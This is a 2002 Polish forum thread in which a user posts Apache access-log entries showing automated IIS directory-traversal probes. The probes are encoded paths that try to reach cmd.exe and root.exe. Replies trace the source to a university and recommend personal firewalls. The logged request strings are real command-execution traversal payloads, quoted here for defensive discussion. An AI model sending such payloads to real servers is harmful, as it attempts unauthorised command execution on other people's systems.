wlam i firewall

kurde mam problem
to wyczytalem w logach swojego kompa, na ktorym odpalilem apache'a do testow nowej strony
--
[file access.log]
--
217.96.60.151 - - [09/May/2002:11:26:50 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
217.96.60.151 - - [09/May/2002:11:26:50 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
217.96.60.151 - - [09/May/2002:11:26:51 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.96.60.151 - - [09/May/2002:11:26:52 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.96.60.151 - - [09/May/2002:11:26:56 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.96.60.151 - - [09/May/2002:11:27:00 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
217.96.60.151 - - [09/May/2002:11:27:01 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
217.96.60.151 - - [09/May/2002:11:27:02 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
217.96.60.151 - - [09/May/2002:11:27:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.151 - - [09/May/2002:11:27:13 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.151 - - [09/May/2002:11:27:13 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.151 - - [09/May/2002:11:27:14 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.151 - - [09/May/2002:11:27:21 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.96.60.151 - - [09/May/2002:11:27:22 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.96.60.151 - - [09/May/2002:11:27:23 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.96.60.151 - - [09/May/2002:11:27:24 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
[...]
217.96.60.203 - - [11/May/2002:00:43:03 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 276
217.96.60.203 - - [11/May/2002:00:43:03 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 274
217.96.60.203 - - [11/May/2002:00:43:03 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.96.60.203 - - [11/May/2002:00:43:04 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
217.96.60.203 - - [11/May/2002:00:43:04 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.96.60.203 - - [11/May/2002:00:43:04 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
217.96.60.203 - - [11/May/2002:00:43:04 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 315
217.96.60.203 - - [11/May/2002:00:43:04 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 331
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
217.96.60.203 - - [11/May/2002:00:43:05 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
217.96.60.203 - - [11/May/2002:00:43:06 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
-------------

nie wiem czy sie dobrze domyslam, ale to byl wlam.
teraz pytania:
1) co zostalo zrobione na moim komputerze bez mojej wiedzy???
2) jak sie przed tym najpewniej zabezpieczyc i czym?



pliz help mi

Nie włam, tylko próba włamu. Ale najciekawsze jest to, że pod tym adresem kryje się...

inetnum: 217.96.60.0 - 217.96.60.255
netname: BWSBII
descr: Bielska Wyzsza Szkola Biznesu i Informatyki im. J. Tyszkiewicza


Ktoś pewnie bawił się jakimś programikiem do włażenia ludziom w ...

a czym sie przed takimi kolesiami zabezpieczyc? poradzcie prosze, niech bedzie cos skutecznego, prostego
Norton Internet Security?
Norton Firewall? (to to samo?)
Zone Alarm?

No jakaś ogniówka by się przydała.
NIS = NAV + NPF

przede wszystkim wyslij te logi do admina sieci z ktorej pochodzil wlam (jesli w jakiejs domenie tp sa to tez na abuse@tpnet.pl - chyba)
moze to kompy konkretnych osob, chociaz pewnie z jakiejs ogolnodostepnej laborki komp)

ja za Adikiem polecam Outpost Firewall

M. C. Viper napisał:

a czym sie przed takimi kolesiami zabezpieczyc? poradzcie prosze, niech bedzie cos skutecznego, prostego Norton Internet Security? Norton Firewall? (to to samo?) Zone Alarm?

Eee, IMO zaden z powyzszych. Firewalla Nortona odrzucam na poczatku (kaleka jakich malo, potwierdzaja to testy), jesli Zone Alarm to tylko w wersji PRO. Osobiscie polecam jeden z dwoch ponizszcyh:

-> Kerio Personal Firewall 2.1.4 (ogromne mozliwosci konfiguracji, bezproblemowa obsluga ICS, wspolpraca z Wingate, WinProxy, ustawiania logow, regulki - nie znam lepszego)
-> Outpost Personal Firewall PRO (o zaletach pisalem jakis czas temu)

Cytat:

-> Kerio Personal Firewall 2.1.4 (ogromne mozliwosci konfiguracji, bezproblemowa obsluga ICS, wspolpraca z Wingate, WinProxy, ustawiania logow, regulki - nie znam lepszego)

ja w tej chwili mam ICS dzieki Kerio WinRoute Pro
czy Kerio Personal Firewall jest w to wyposazony? czy ma swoj osobny program do tego?

Nie, Kerio to tylko i wylacznie firewall - nie ma nic wspolnego z rozdzielaniem Internetu na lan.

Mialem na mysli to, ze po zaznaczeniu w opcjach Is Running on Internet Gateway nie mamy zadnych konfliktow i wszystko co powinno trafiac do kompa robiacego za bramke dochodzi.

ja mam lepsza rade i sprawdzona przeze mnie od lat - NIE STAWIAC NIZ POWAZNEGO, ZADNYCH APACHOW, FTPOW nia nic w tym rodzaju na ZADNYCH WINDOWSACH, bo one sa do gierek a do serverow sa -nixy.

Richie: odpalam ten serwer tylko powiedzmy na jakies 1-2h/dzien. wtedy to testuje strone.
i akurat wtedy koles mnie jakis chce okrasc
powazny serwer to ja mam, tylko nie ma sensu wysylac co chwila tam jakichs poprawek, wiec odpalam u siebie

jaki problem odpalic sobie apacha lokalnie bez dostepu z zewnatz skoro testujesz sobie tylko stronke sam?

no problem w tym ze nie tylko ja ja ogladam i testuje...
bo tak to by bylo wszycho git.

Cytat:

inetnum: 217.96.60.0 - 217.96.60.255 netname: BWSBII descr: Bielska Wyzsza Szkola Biznesu i Informatyki im. J. Tyszkiewicza

O k.... toz to moja uczelnia jest
Pierwsze ip jest z biblioteki bodajze, a to drugie z ktorejs laborki wiec nie powinno byc problemu z dorwaniem delikwenta bo w laborkach kazdy musi sie logowac na siebie. Tylko kto qfa godzina w drugim wlamie jest conajmniej dziwna

O Aro -twoja uczelnia? A kto cię uczy angielskiego? Mam tam kilkoro kolegów i koleżanek, którzy tym się parają

Kasia Zieleznik